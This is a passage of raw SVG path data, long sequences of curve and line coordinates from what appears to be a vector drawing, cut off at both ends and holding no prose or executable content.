1099.525,459.2695 1097.8494,458.63706 C 1094.2879,457.29275 1092.9557,458.58023 1095.8271,460.59142 C 1097.0406,461.4414 1097.7433,462.60637 1097.3886,463.18023 C 1096.6983,464.2971 1098.6908,465.95946 1100.75,465.98469 C 1101.4375,465.99311 1102,465.55 1102,465 z M 1091,454.55902 C 1091,453.70156 1091.45,453 1092,453 C 1093.2939,453 1093.2939,454.70032 1092,455.5 C 1091.45,455.83992 1091,455.41648 1091,454.55902 z M 1096.6499,450.36831 C 1094.1691,449.50944 1092.1956,449.36013 1091.0968,449.94819 C 1090.1593,450.44993 1088.7837,450.48438 1088.04,450.02475 C 1087.2963,449.56511 1085.6331,449.38031 1084.3439,449.61408 C 1083.0548,449.84785 1082,449.58031 1082,449.01956 C 1082,448.4588 1081.1158,448 1080.0352,448 C 1078.9545,448 1077.5887,447.1 1077,446 C 1076.4113,444.9 1076.1863,444 1076.5,444 C 1076.8137,444 1076.6003,443.1217 1076.0258,442.04823 C 1075.1303,440.37494 1074.2692,440.18079 1069.9906,440.68752 C 1067.2363,441.01372 1065,440.87208 1065,440.37143 C 1065,439.87249 1066.1237,437.81057 1067.4971,435.78939 C 1068.9738,433.61624 1069.5868,431.86267 1068.9971,431.49824 C 1068.4487,431.15929 1068,431.3282 1068,431.8736 C 1068,432.41899 1067.1,433.15087 1066,433.5 C 1064.9,433.84913 1064,435.00826 1064,436.07586 C 1064,437.76662 1063.7421,437.85587 1062,436.76793 C 1060.9,436.08097 1059.9858,435.06465 1059.9684,434.50945 C 1059.9046,432.47086 1055.3886,428.44627 1051.4219,426.89291 C 1047.2246,425.24926 1044.4879,425.28622 1035,427.11474 C 1031.975,427.69772 1028.5066,428.36418 1027.2925,428.59575 C 1026.0783,428.82732 1023.8938,430.12066 1022.438,431.46984 C 1020.1494,433.5909 1018.8985,433.90769 1013.1959,433.81051 C 1009.02,433.73935 1006.4599,434.12033 1006.217,434.84906 C 1006.006,435.48208 1004.9708,436 1003.9167,436 C 1002.8625,436 1002,436.45 1002,437 C 1002,438.60091 996.3942,438.15527 992.5657,436.25 C 989.2412,434.59554 987.28972,430.40647 990.3994,431.59977 C 993.04582,432.6153 991.25638,422.55124 987.38902,414.66896 C 986.62506,413.11189 986,411.26913 986,410.57395 C 986,409.87876 985.1,408.49549 984,407.5 C 982.9,406.50451 982.00689,404.97227 982.01531,404.09501 C 982.02871,402.7 982.15218,402.68809 983,404 C 984.04922,405.62355 984.04089,405.65245 984.45014,398.96674 C 984.60277,396.47345 985.06751,393.36265 985.48291,392.05385 C 986.17174,389.88353 986.3259,389.83096 987.23542,391.45619 C 987.90679,392.65586 987.89378,393.44761 987.19562,393.8791 C 985.16189,395.13601 984.76815,399.82887 986.41879,403.13767 C 987.4216,405.14784 987.67662,406.72338 987.09358,407.30642 C 986.11312,408.28688 986.35107,409.52694 988.47391,414.5 C 992.76,424.54077 993.84165,431.42961 991.35098,432.82346 C 990.127,433.50843 990.5258,434.02162 993.308,435.34187 C 997.75118,437.45029 998.23307,437.42948 1003.2983,434.91032 C 1006.1765,433.47886 1009.3647,432.83184 1013.4199,432.85621 C 1018.2723,432.88537 1019.8642,432.45064 1022.247,430.4456 C 1023.8459,429.1002 1026.132,427.81386 1027.3271,427.58706 C 1028.5222,427.36027 1031.975,426.69772 1035,426.11474 C 1043.6422,424.44922 1047.3731,424.17324 1049.0953,425.07212 C 1049.9727,425.53008 1051.9469,426.1326 1053.4824,426.41104 C 1056.6152,426.97911 1058.918,429.15785 1060.7545,433.29126 L 1061.9947,436.08251 L 1065.9908,432.12616 C 1070.0216,428.13544 1071.1393,427.99649 1070.5678,431.55714 C 1070.3937,432.64194 1071.7864,435.39113 1073.7212,437.78201 C 1075.627,440.13712 1077.2971,442.83712 1077.4324,443.78201 C 1077.7025,445.66809 1081.4592,447.96207 1084.3157,447.98526 C 1085.3144,447.99337 1086.9397,448.43256 1087.9276,448.96125 C 1089.1879,449.63572 1090.287,449.49603 1091.6119,448.49306 C 1094.0821,446.6229 1095.5055,446.64841 1097.4549,448.59776 C 1098.8638,450.00663 1099.3155,450.02447 1101.2763,448.74862 C 1102.4993,447.95283 1105.1717,446.99141 1107.2149,446.61213 C 1111.2947,445.8548 1111.6879,445.49565 1112.3402,441.92993 C 1113.1008,437.77207 1116.3404,431.62671 1119.3524,428.628 C 1122.9056,425.09044 1125.3607,416.01218 1123.9844,411.5 C 1123.4811,409.85 1122.8242,407.27836 1122.5245,405.78525 C 1121.9848,403.09651 1117.7294,398 1116.0241,398 C 1115.5373,398 1114.9953,396.9875 1114.8196,395.75 C 1114.6086,394.26487 1113.9149,393.59763 1112.779,393.78719 C 1111.6297,393.97896 1110.5842,392.94056 1109.632,390.66156 C 1108.8477,388.78451 1107.0135,386.40528 1105.5561,385.37437 C 1099.5328,381.11381 1098.7554,380.27681 1098.4784,377.75408 C 1098.3191,376.30218 1097.8087,374.52606 1097.3443,373.80713 C 1096.8799,373.08821 1096.0231,370.925 1095.4402,369 C 1094.6082,366.25224 1093.9096,365.5512 1092.1902,365.73821 C 1090.9856,365.86923 1089.9315,365.41923 1089.8477,364.73821 C 1089.2511,359.88802 1086.8025,353 1085.675,353 C 1085.1204,353 1084.9142,353.24753 1085.2167,353.55006 C 1085.5193,353.8526 1085.3346,355.7651 1084.8065,357.80006 C 1084.2783,359.83503 1083.6891,363.45024 1083.4972,365.83386 C 1082.7958,374.54672 1078.6059,379.33441 1074.8214,375.74759 C 1074.0946,375.05876 1071.7,373.59626 1069.5,372.49759 C 1064.0384,369.77009 1060.6186,366.42279 1061.6333,364.7978 C 1062.0791,364.08401 1062.5346,362.89966 1062.6457,362.16592 C 1062.7568,361.43218 1063.6695,360.22081 1064.6739,359.474 C 1066.4216,358.17444 1066.4142,358.11751 1064.5,358.14767 C 1061.9553,358.18776 1056.6902,357.35384 1053.9032,356.46929 C 1052.4497,356.00795 1051.972,356.14566 1052.4338,356.89287 C 1052.8851,357.62316 1051.9066,358 1049.559,358 C 1047.6016,358 1046,358.45 1046,359 C 1046,359.55 1045.2984,360 1044.441,360 C 1043.5835,360 1043.076,360.3375 1043.3131,360.75 C 1043.5502,361.1625 1042.9018,362.36623 1041.8721,363.42497 C 1039.1837,366.18928 1039.5661,364.10287 1042.5536,359.70626 C 1044.0075,357.56667 1045.5814,356.24127 1046.2081,356.62864 C 1046.8363,357.01686 1047.0275,356.85358 1046.6535,356.24839 C 1046.293,355.66504 1045.0382,355.43875 1043.8651,355.74552 C 1042.3772,356.13462 1041.8657,355.903 1042.1735,354.9796 C 1042.6697,353.49091 1050.8885,352.68051 1052.4912,353.96224 C 1053.7357,354.95752 1059.5805,356.30024 1063.1673,356.4148 C 1066.6887,356.52729 1067.3974,357.38886 1066.0458,359.91435 C 1065.3043,361.29986 1065.2771,362 1065.9648,362 C 1066.5342,362 1067,362.675 1067,363.5 C 1067,364.43333 1066.0556,365 1064.5,365 C 1060.8017,365 1061.4173,366.15058 1067.1092,369.8768 C 1071.4714,372.73255 1072.5679,373.06229 1074.6092,372.13221 C 1076.9204,371.07917 1078.0633,372.22484 1075.9837,373.51008 C 1074.5724,374.38231 1075.7621,376 1077.8149,376 C 1080.0204,376 1082.0208,371.38088 1082.4408,365.31849 C 1082.9525,357.93059 1084.0684,353.18813 1085.5928,351.923 C 1086.6757,351.02427 1087.1052,351.17951 1087.5695,352.63738 C 1087.8958,353.66182 1088.6572,355.625 1089.2615,357 C 1089.8659,358.375 1090.3917,360.6236 1090.4302,361.99688 C 1090.4719,363.48977 1091.1031,364.518 1092,364.55403 C 1095.1677,364.68131 1096.7005,366.16947 1096.7867,369.20145 C 1096.8352,370.90821 1097.3517,372.59935 1097.9345,372.95954 C 1098.5173,373.31973 1099.1636,375.06926 1099.3706,376.84739 C 1099.7558,380.1557 1100.4647,381.40428 1102.0833,381.625 C 1102.5875,381.69375 1103.4154,381.80625 1103.9231,381.875 C 1105.7578,382.12345 1111,388.19902 1111,390.07692 C 1111,391.13462 1111.3375,391.94671 1111.75,391.88158 C 1114.396,391.46379 1116,392.23185 1116,393.91667 C 1116,394.97083 1116.3375,395.98333 1116.75,396.16667 C 1117.1625,396.35 1118.7375,397.99703 1120.25,399.82673 C 1121.7625,401.65642 1123,402.66892 1123,402.07673 C 1123,401.48453 1123.4217,401 1123.9371,401 C 1124.4526,401 1124.6234,402.54592 1124.3168,404.43537 C 1124.0102,406.32483 1124.263,409.31578 1124.8787,411.08194 C 1125.6126,413.18709 1125.6886,415.5343 1125.0994,417.89657 C 1124.605,419.87846 1123.9267,422.71839 1123.5919,424.20754 C 1123.2571,425.69668 1121.869,428.17168 1120.5071,429.70754 C 1116.2374,434.52284 1116,434.8784 1116,436.45779 C 1116,437.30601 1115.6139,438 1115.1421,438 C 1114.6702,438 1113.8827,439.88396 1113.3921,442.18657 C 1112.5443,446.16539 1112.2528,446.4361 1107.5193,447.64181 C 1104.7799,448.33958 1102.0796,449.53828 1101.5185,450.30559 C 1100.6568,451.48406 1099.9008,451.4938 1096.6499,450.36831 z M 1071.5047,437.99233 C 1071.8473,437.43811 1071.3645,436.2216 1070.4318,435.28897 C 1068.8376,433.69472 1068.7764,433.72022 1069.4096,435.71531 C 1069.9034,437.27086 1069.6049,437.96156 1068.2916,438.30267 C 1066.8572,438.67522 1066.9368,438.79113 1068.691,438.884 C 1069.896,438.9478 1071.1622,438.54655 1071.5047,437.99233 z M 1051,356 C 1051,355.45 1050.325,355 1049.5,355 C 1048.675,355 1048,355.45 1048,356 C 1048,356.55 1048.675,357 1049.5,357 C 1050.325,357 1051,356.55 1051,356 z M 652.96917,435.77766 C 649.87431,434.54307 647.39109,429.99436 649.20124,428.87563 C 650.63615,427.98881 645.96216,418.10148 642.01692,413.67795 C 639.43938,410.78793 636.98636,403.25707 636.57534,396.9721 C 636.35982,393.67659 633.22257,387.08627 628.87224,380.79049 C 627.84251,379.30026 627,376.56944 627,374.72199 C 627,369.70441 629.86208,360.72766 632.06379,358.83971 C 634.36757,356.86422 634.54888,353.28659 632.54131,349.41699 C 631.57029,347.54534 631.40924,346.21183 632.05958,345.42821 C 632.71753,344.63543 632.32254,342.65902 630.84995,339.37552 C 629.64733,336.69399 628.58774,334.275 628.49532,334 C 627.57634,331.26577 626.07623,329.16201 622.53623,325.64297 C 617.9887,321.12237 615.39484,316.36839 617.15561,315.78146 C 617.73447,315.58851 618.35237,314.09625 618.52873,312.46532 C 618.70509,310.83439 619.29514,308.06095 619.83994,306.30211 C 620.58082,303.91026 620.50321,302.83259 619.53203,302.02658 C 618.57069,301.22874 618.07526,301.36148 617.62385,302.53786 C 617.2885,303.41176 616.52174,303.82245 615.91993,303.45051 C 615.132,302.96355 615.13002,302.46998 615.91287,301.68713 C 618.11674,299.48326 616.93052,298.75156 612.17625,299.38223 C 607.4556,300.00845 607.28318,299.93585 604.10866,295.98559 C 600.88719,291.9769 600.82905,291.95369 595.6824,292.62192 C 592.83208,292.992 590.275,293.58483 590,293.93933 C 589.55222,294.51656 585.66093,295.81726 579.26386,297.52798 C 577.43645,298.01667 576.72716,297.4957 575.38337,294.67774 C 573.94894,291.66971 573.9163,290.8638 575.12773,288.36476 C 577.54616,283.3758 574.97886,278.1128 571.52504,280.97922 C 570.66494,281.69304 569.81389,281.45183 568.64828,280.16385 C 567.03862,278.38519 563.73344,277.93323 562.36238,279.30429 C 561.98928,279.67739 561.12018,279.5147 560.43104,278.94277 C 558.66534,277.47737 557.94535,279.14891 558.86349,282.58198 C 559.43451,284.71707 559.13041,286.35953 557.72218,288.7463 C 556.26742,291.21193 556.13142,292 557.16068,292 C 559.11382,292 561.08731,295.6089 560.2819,297.70776 C 559.63396,299.39627 559.7357,299.4032 562.13122,297.83359 C 565.18874,295.83023 573.52114,294.41617 574.3515,295.75973 C 574.68186,296.29426 573.95676,296.52323 572.69655,296.28232 C 571.46294,296.0465 568.43905,296.5907 565.97681,297.49164 C 563.51456,298.39259 560.91917,299.21303 560.20926,299.31486 C 559.49935,299.41669 554.66789,296.8 549.47269,293.5 C 541.62181,288.51312 539.8446,286.90902 538.94747,284 C 538.25666,281.75999 535.94114,278.88002 532.51543,276 C 527.84118,272.07034 527.15246,271.02074 527.08139,267.71862 C 527.03217,265.43211 526.43758,263.72141 525.57732,263.3913 C 524.40789,262.94254 524.47311,262.52689 525.94374,261.05626 C 528.86768,258.13232 529.80617,243.10206 527.12071,242.2069 C 524.64578,241.38193 526.15078,237.25456 532.68511,226.94692 C 536.95394,220.21302 540.40096,216 541.6417,216 C 542.33362,216 544.97234,214.60122 547.50551,212.8916 C 551.48781,210.20398 552.03471,209.42561 551.54558,207.1416 C 550.76003,203.47346 554.19404,198.2347 558.5873,196.39908 C 562.83631,194.62373 565.3382,189.83638 563.79129,186.44128 C 562.92764,184.54577 562.21788,184.33383 558.23657,184.78258 C 554.41995,185.21277 553.76846,185.04576 554.26057,183.76334 C 554.58428,182.91979 554.16901,181.25861 553.33777,180.07184 C 552.32626,178.62772 552.14766,177.51488 552.79773,176.70704 C 554.44599,174.65879 555.07236,169.65688 554.09993,166.30831 C 553.28624,163.50637 553.46723,162.92388 555.58211,161.53815 C 556.9071,160.66999 559.00566,160.19377 560.24558,160.47987 C 561.48551,160.76597 566.45387,161.19946 571.28637,161.44317 L 580.07275,161.88627 L 580.65813,158.95937 C 581.0202,157.14898 581.67389,156.29023 582.37175,156.70819 C 582.99229,157.07984 582.8824,156.62254 582.12756,155.69196 C 581.37271,154.76138 581.06983,154 581.45448,154 C 583.41162,154 575.80959,148.00784 572.89395,147.25233 C 568.28161,146.05715 567.87198,143.3965 572.19995,142.74469 C 574.01498,142.47135 575.63408,142.59419 575.79795,143.01769 C 575.96182,143.44119 576.92204,143.57164 577.93177,143.30759 C 579.20592,142.97439 579.60544,142.20722 579.23752,140.80026 C 578.75738,138.96421 578.9234,138.88864 580.99802,139.99894 C 584.168,141.69546 591,139.51363 591,136.80476 C 591,135.26964 590.65403,135.11479 589.09196,135.95078 C 588.04254,136.51242 584.21754,137.03626 580.59196,137.11487 C 576.96638,137.19349 574,137.60768 574,138.03529 C 574,138.4629 573.0976,138.57678 571.99467,138.28836 C 570.89174,137.99993 569.35681,138.28891 568.5837,138.93053 C 567.66942,139.68932 566.96101,139.74593 566.55716,139.09249 C 566.21567,138.53995 567.07174,137.34387 568.45955,136.43455 C 569.84735,135.52522 570.7306,134.37311 570.42232,133.8743 C 570.11403,133.37549 569.47399,133.20706 569,133.5 C 568.52601,133.79294 567.8793,133.61372 567.56287,133.10172 C 567.24644,132.58973 568.22784,131.71791 569.74377,131.16436 C 571.47658,130.53161 571.8502,130.12858 570.75,130.07895 C 568.82787,129.99223 568.74458,129.82919 569.5501,127.73004 C 569.89781,126.82392 571.00156,126.4688 572.5501,126.76483 C 575.58138,127.34429 575.69898,125.92306 572.82811,123.40499 C 571.63356,122.35724 570.95598,122.01535 571.32236,122.64522 C 571.68875,123.27508 571.29273,124.05743 570.44232,124.38376 C 569.59191,124.71009 569.14191,124.5794 569.44232,124.09333 C 569.74273,123.60726 569.28758,122.94059 568.43087,122.61185 C 567.55975,122.27757 567.18964,121.50217 567.59113,120.85255 C 568.04781,120.11363 567.87128,119.96152 567.10595,120.43452 C 566.22567,120.97856 566.19724,121.53274 567,122.5 C 567.79741,123.46083 567.79229,124.01034 566.98125,124.51159 C 566.33387,124.91169 565.63476,124.31931 565.31606,123.10062 C 564.62864,120.4719 563.59854,120.46696 559.38318,123.0722 C 557.32384,124.34494 555.25528,124.89841 554.02144,124.50681 C 552.47577,124.01623 552.15109,124.23015 552.61328,125.43461 C 552.94366,126.29557 553.95333,127.03163 554.85699,127.07029 C 556.13993,127.12517 556.06169,127.32892 554.5,128 C 552.5,128.85943 552.5,128.85943 554.5,129.04572 C 556.2063,129.20465 556.24301,129.29916 554.75,129.68933 C 553.7875,129.94085 553,130.84114 553,131.68996 C 553,132.83416 553.58185,133.04962 555.25,132.52314 C 556.4875,132.13258 558.72302,131.58114 560.21783,131.29773 C 564.40251,130.50434 565.34613,128.70511 562.99768,125.99732 C 560.54177,123.16563 560.53761,123.06632 562.90076,123.6843 C 565.13655,124.26897 566.13831,128.11609 564.58548,130.15425 C 563.34114,131.78749 556.49925,134 552.693,134 C 549.31072,134 548.20397,132.05524 550.59235,130.30881 C 551.94703,129.31825 552.14973,128.71057 551.30055,128.18575 C 549.42304,127.02539 550.44835,123.53457 552.7679,123.18997 C 553.91567,123.01945 555.39254,122.23195 556.04982,121.43997 C 556.70711,120.64798 558.50229,120 560.03911,120 C 561.57593,120 563.06157,119.4375 563.34054,118.75 C 563.72223,117.80932 564.11025,117.87119 564.90856,119 C 565.82396,120.29439 565.97147,120.26012 565.98469,118.75 C 565.99311,117.7875 565.325,117 564.5,117 C 563.675,117 563,116.55 563,116 C 563,115.45 563.55013,115 564.22251,115 C 564.89488,115 564.44488,114.29948 563.22251,113.4433 C 562.00013,112.58711 561,111.44799 561,110.91191 C 561,109.24976 564.15144,108.63187 565.11922,110.10428 C 565.87981,111.26147 566.21286,111.20092 567.06799,109.75 C 567.66908,108.7301 569.29548,108 570.96636,108 C 572.54319,108 574.00989,107.47033 574.22568,106.82295 C 574.44514,106.16458 575.16426,105.98348 575.85758,106.41198 C 576.80407,106.99694 576.82243,107.50903 575.93525,108.57802 C 575.29623,109.348 574.37035,109.72889 573.87774,109.42444 C 572.30991,108.45547 569.125,110.0308 568.46822,112.10012 C 568.11096,113.22575 568.49671,115.10914 569.35183,116.41421 C 570.48377,118.14177 570.5811,119.0189 569.73476,119.86524 C 568.88841,120.71159 569.60395,121.02007 572.55,121.07895 C 574.7225,121.12237 575.9375,121.38487 575.25,121.66228 C 573.53815,122.35303 573.6705,124 575.43785,124 C 576.25925,124 576.81111,124.85746 576.72505,126 C 576.62042,127.3889 575.85751,128 574.22818,128 C 572.85304,128 572.14897,128.43202 572.52707,129.0438 C 572.88188,129.6179 572.67195,130.69035 572.06057,131.42702 C 570.47666,133.33552 573.5043,134.33411 576.32244,132.83269 C 578.29026,131.7843 578.36781,131.83281 577.12756,133.33628 C 576.37271,134.25133 574.93677,135 573.93657,135 C 572.93638,135 571.81012,135.49821 571.43379,136.10713 C 570.96707,136.8623 571.46938,136.9858 573.01381,136.49562 C 574.25916,136.10036 578.17581,135.79368 581.71749,135.81412 C 586.95378,135.84432 588.05251,135.57922 587.59816,134.39521 C 587.24892,133.4851 587.9694,132.51543 589.51971,131.80907 C 592.8286,130.30143 592.67523,128.77777 589.25492,129.17843 C 587.34752,129.40187 586.50097,129.04226 586.48079,128 C 586.46482,127.175 585.73283,126.55288 584.85414,126.61751 C 583.76471,126.69764 583.41187,126.14099 583.7449,124.86751 C 584.06652,123.63763 583.7043,123 582.68402,123 C 581.83194,123 580.84913,122.1 580.5,121 C 580.15087,119.9 579.33305,118.93146 578.68261,118.84769 C 578.03218,118.76391 577.05,118.59082 576.5,118.46304 C 575.95,118.33525 574.6,118.15718 573.5,118.06732 C 571.9409,117.93995 572.25555,117.52874 574.92735,116.20197 C 580.15525,113.60588 579.99916,112.03379 574.56409,112.54327 C 572.05384,112.77858 570,112.57575 570,112.09254 C 570,110.68908 573.14116,109.87226 574.42878,110.9409 C 575.07519,111.47737 576.59316,111.65765 577.80204,111.34152 C 580.24508,110.70265 580.6412,112.00042 578.8692,114.83783 C 577.90537,116.38117 578.56978,117.48657 583.36897,122.32426 C 586.46577,125.44592 589.64808,128 590.44075,128 C 592.7655,128 593.32606,129.98223 591.55479,131.93946 C 590.04266,133.61034 590.04139,133.80191 591.53862,134.37644 C 592.43234,134.7194 593.81999,135 594.62228,135 C 595.42457,135 597.36998,135.953 598.94542,137.11777 C 600.52087,138.28255 602.25549,138.96013 602.80015,138.62352 C 603.3448,138.2869 604.09285,138.7964 604.46246,139.75574 C 605.0843,141.36972 605.2161,141.35459 606.22704,139.55326 C 607.03944,138.10568 607.0115,137.50383 606.11805,137.20602 C 605.24545,136.91515 605.21322,136.44801 606.00033,135.4996 C 606.88216,134.43706 606.30119,134.36961 602.88288,135.13765 C 597.5795,136.32924 595.70073,134.89742 599.3931,132.47809 C 600.82689,131.53863 602,130.19162 602,129.48473 C 602,128.32477 609.30483,125.97048 614.5,125.45606 C 615.66053,125.34115 616.34168,124.6792 616.12281,123.87901 C 615.91535,123.12056 615.72785,121.9375 615.70614,121.25 C 615.68443,120.5625 615.29167,120 614.83333,120 C 613.52293,120 613.86059,115.35396 615.25,114.26688 C 615.9375,113.72897 617.4,113.04992 618.5,112.75789 C 619.6,112.46585 621.26486,111.9114 622.19968,111.52578 C 623.57121,110.96 623.81671,111.28039 623.47129,113.18527 C 622.86072,116.55239 626.26754,118.62644 629.12332,116.62618 L 631.17383,115.18995 L 629.13251,114.54206 C 628.00978,114.18572 626.52974,112.34151 625.84353,110.44383 C 624.5079,106.75021 623.06738,106.59017 618.28518,109.60413 C 614.89241,111.7424 608.38363,111.38363 605.92268,108.92268 C 604.7417,107.7417 604.10191,106.17681 604.43993,105.29593 C 604.76695,104.44375 604.5422,103.15331 603.94049,102.42829 C 602.29571,100.44646 603.21411,96.574973 605.42928,96.152366 C 606.49038,95.949929 607.98502,95.157832 608.75071,94.39215 C 609.51639,93.626467 610.79182,93 611.585,93 C 613.01661,93 613.72862,92.716343 619.5,89.846778 C 625.49699,86.865035 627.53646,85.439519 630.36863,82.25 C 631.95586,80.4625 633.68876,79 634.21952,79 C 634.75028,79 636.2827,78.136189 637.62489,77.08042 L 640.06524,75.160841 L 636.37496,75.453647 L 632.68467,75.746453 L 635.09234,73.895463 C 636.41655,72.877418 638.4,71.967839 639.5,71.874176 C 643.65179,71.52066 644.55331,71.355868 646.5,70.594622 C 651.5374,68.624766 653.71086,68.106326 656.5,68.209308 C 659.76803,68.329972 662.21618,67.838334 663,66.903972 C 664.07173,65.626409 669,64.96883 669,66.103393 C 669,66.886975 669.39194,66.929155 670.25,66.237917 C 672.19018,64.674956 677.34097,63.901447 678.94612,64.931999 C 679.83787,65.504529 681.06511,65.500336 682.1475,64.92106 C 683.6966,64.092009 687.53535,64.61575 694.89313,66.660015 C 698.16388,67.568751 694.89582,67.986668 691.13198,67.140988 C 688.85939,66.630372 687,66.556787 687,66.977467 C 687,68.06044 696.3814,69.17461 698.53657,68.347594 C 699.69531,67.902944 700.09306,68.040417 699.66267,68.736802 C 699.24539,69.411973 699.7015,69.629315 700.88576,69.319623 C 701.92445,69.048001 703.07663,69.314967 703.44616,69.912882 C 703.81569,70.510797 705.88468,71 708.04391,71 C 712.82156,71 728.58821,75.445357 730.46418,77.321321 C 734.18864,81.045782 725.29002,83.545818 713.87286,81.982592 C 709.42766,81.373959 705.53778,81.12889 705.22867,81.437994 C 704.91957,81.747097 705.69415,82 706.94996,82 C 708.76375,82 709.12239,82.423969 708.69409,84.061803 C 708.04874,86.529609 713.0238,90.036933 717,89.917315 C 719.49116,89.842371 719.4901,89.838496 716.7,88.821053 C 715.16,88.259474 714.08054,87.2825 714.30121,86.65 C 714.72594,85.43257 715.80204,85.42558 723,86.593496 C 726.9737,87.238255 727.35191,87.144265 726.23381,85.789852 C 725.15927,84.488218 725.462,84.049304 728.23381,82.89015 C 730.03021,82.138902 733.63611,81.51879 736.2469,81.512123 C 739.36962,81.504148 740.99487,81.072304 740.9969,80.25 C 740.99861,79.5625 740.4949,79 739.87756,79 C 739.13562,79 739.20757,78.45482 740.08981,77.391787 C 741.22382,76.025386 741.13831,75.574306 739.52112,74.391787 C 737.79062,73.126413 738.02362,73 742.08636,73 C 744.73362,73 747.56276,73.713282 749.02749,74.75 L 751.5,76.5 L 747.5,77.060053 L 743.5,77.620107 L 747.40916,78.451203 C 750.1532,79.034593 751.94042,78.89379 753.40558,77.978785 C 756.3456,76.142711 771.88459,71.985944 775.49297,72.070285 C 777.93928,72.127464 778.13704,72.282608 776.55355,72.902281 C 774.65762,73.644224 774.66042,73.677935 776.66152,74.201234 C 777.79145,74.496717 779.52839,74.2838 780.5214,73.728086 C 781.51441,73.172372 786.03996,72.668715 790.57819,72.608848 C 796.58661,72.529588 798.57477,72.192979 797.89233,71.370515 C 797.37688,70.749298 795.61524,69.973048 793.97757,69.645515 C 790.60525,68.971049 789.92087,67 793.05902,67 C 794.36076,67 794.85561,67.424612 794.40451,68.154508 C 794.00727,68.797248 794.12612,69.040087 794.67262,68.702333 C 796.04692,67.852966 815.48875,70.652966 821.36028,72.545874 C 824.03344,73.407666 826.43498,73.898352 826.69705,73.636287 C 827.5236,72.809732 822.13862,69.796292 821.04398,70.472821 C 820.46979,70.827688 820,70.416476 820,69.559017 C 820,68.701558 820.45,68 821,68 C 821.55,68 822,67.523442 822,66.940983 C 822,66.358524 821.625,66.113729 821.16667,66.396994 C 820.70833,66.68026 820.33333,66.246567 820.33333,65.433233 C 820.33333,64.619898 821.49583,63.666188 822.91667,63.313876 C 824.3375,62.961564 826.88195,61.171815 828.571,59.336655 C 832.61658,54.941126 834.77509,54.985898 841.83102,59.611694 C 842.01308,59.731051 841.67436,60.739938 841.07832,61.853665 C 840.34913,63.216154 840.32785,64.084589 841.01326,64.508194 C 841.57352,64.854458 841.86178,66.681767 841.65382,68.568882 C 841.44586,70.455997 841.40187,72 841.55607,72 C 841.71026,72 842.61558,72.298991 843.56789,72.664425 C 845.03092,73.225843 845.19482,72.912376 844.62511,70.642466 C 844.12988,68.669306 844.37428,67.793604 845.54567,67.344101 C 846.8467,66.84485 846.64953,66.410069 844.47526,64.983772 C 843.0094,64.022181 842.1903,63.01967 842.65503,62.75597 C 844.00035,61.992607 849.41939,60.65346 850.32433,60.860739 C 850.77771,60.964587 850.85912,60.581063 850.50523,60.008465 C 850.15135,59.435866 849.4429,59.226274 848.9309,59.542705 C 848.41891,59.859136 848,59.60848 848,58.985693 C 848,58.362905 848.7875,58.007229 849.75,58.195302 C 850.76528,58.393687 851.5,59.436138 851.5,60.678268 C 851.5,61.855827 851.90965,63.197446 852.41033,63.659642 C 852.95074,64.158522 852.98567,63.923011 852.49628,63.080061 C 851.85731,61.979468 852.10238,61.829926 853.58596,62.415138 C 854.63868,62.830396 856.9625,63.415747 858.75,63.715919 C 860.5375,64.01609 862,64.70529 862,65.247474 C 862,65.789658 860.9875,65.961923 859.75,65.630286 C 858.5125,65.298649 856.29464,65.021165 854.82143,65.013655 C 853.34821,65.006145 851.45456,64.311698 850.6133,63.47044 C 849.5817,62.438843 848.21174,62.159736 846.4053,62.613124 L 843.72686,63.285369 L 846.01261,65.009511 C 848.13852,66.613091 848.17412,66.803175 846.52174,67.727897 C 843.21359,69.579231 846.03313,71.498527 852.08906,71.517635 C 856.03914,71.530098 858.18614,72.043284 859.41049,73.267635 C 860.36329,74.220436 860.68727,75 860.13045,75 C 859.57362,75 858.90134,74.649377 858.63649,74.220838 C 858.37163,73.792299 855.8211,73.340129 852.96863,73.216016 C 848.50261,73.021697 847.87056,73.220313 848.4177,74.646125 C 849.482,77.41966 841.16989,83.252643 837.27232,82.467339 C 836.29755,82.270935 833.73113,81.824782 831.56919,81.475887 C 828.82334,81.032762 828.0555,80.583731 829.02209,79.986347 C 829.78314,79.515995 831.552,79.35924 832.9529,79.638003 C 834.62094,79.969921 836.68132,79.343323 838.92291,77.822422 C 842.713,75.250869 843.98599,73 841.65026,73 C 840.48334,73 840.21941,72.065443 840.50505,68.944868 C 840.77177,66.030946 840.45936,64.729768 839.39494,64.321312 C 838.098,63.823629 838.10598,63.54038 839.45901,62.045293 C 841.61558,59.662308 840.49616,59 834.31189,59 C 829.57056,59 828.82663,59.286397 827.81805,61.5 C 827.1133,63.046757 825.85297,64 824.51268,64 C 822.67451,64 822.41308,64.454401 822.78669,67 C 823.03314,68.679142 823.83746,70 824.6135,70 C 825.37607,70 826,70.45 826,71 C 826,71.55 826.9,72 828,72 C 829.97842,72 829.9777,72.022304 827.93309,74.066912 C 826.53321,75.466791 825.48437,75.824242 824.68309,75.174531 C 823.20359,73.974899 813.18769,71.439158 806.29609,70.519468 C 800.30816,69.720374 798.27424,70.420588 800.12071,72.645452 C 800.79052,73.45252 800.92487,74.013641 800.41927,73.892387 C 799.91367,73.771133 798.2142,74.031648 796.64267,74.471309 C 794.86158,74.969597 793.5398,74.873418 793.13347,74.215962 C 792.68658,73.492873 790.44068,73.458729 785.99081,74.107373 C 779.56358,75.044249 774.7728,75.276811 768,74.980714 C 766.075,74.896556 763.15,75.38012 761.5,76.055301 C 759.85,76.730482 757.67115,77.372092 756.65812,77.481102 C 755.64508,77.590111 754.45157,78.269348 754.00586,78.990517 C 753.42519,79.930061 751.76482,80.132293 748.14828,79.703967 C 743.66649,79.173166 743.02853,79.334735 742.4536,81.146205 C 741.91093,82.85598 741.25764,83.083315 738.41788,82.550572 C 736.55434,82.20097 733.22296,82.401418 731.01482,82.99601 C 727.07106,84.057954 726.02183,85.277424 728,86.5 C 730.17146,87.842033 728.78666,88.497444 724.5,88.156512 C 720.89179,87.86954 720,88.115832 720,89.399306 C 720,90.556775 719.04721,91 716.55902,91 C 714.66648,91 712.83992,90.55 712.5,90 C 712.16008,89.45 711.05667,89 710.04797,89 C 708.17397,89 706.52143,86.506491 706.88968,84.23448 C 707.0025,83.538444 705.74647,82.699295 704.09852,82.369703 C 702.45056,82.040112 700.29173,80.862291 699.30112,79.752322 C 697.54942,77.789575 697.55955,77.752719 699.67011,78.409132 C 707.33461,80.79289 721.55572,82.196719 725.97752,81.006054 C 731.65115,79.478304 730.89744,76.761994 724.5,75.681164 C 722.85,75.402401 719.66472,74.507308 717.42161,73.692067 C 715.17849,72.876827 710.90349,72.210131 707.92161,72.210522 C 704.93972,72.210912 701.825,71.943942 701,71.617254 C 696.62996,69.88678 692.00301,70.522434 688.17643,73.378967 C 687.14834,74.14643 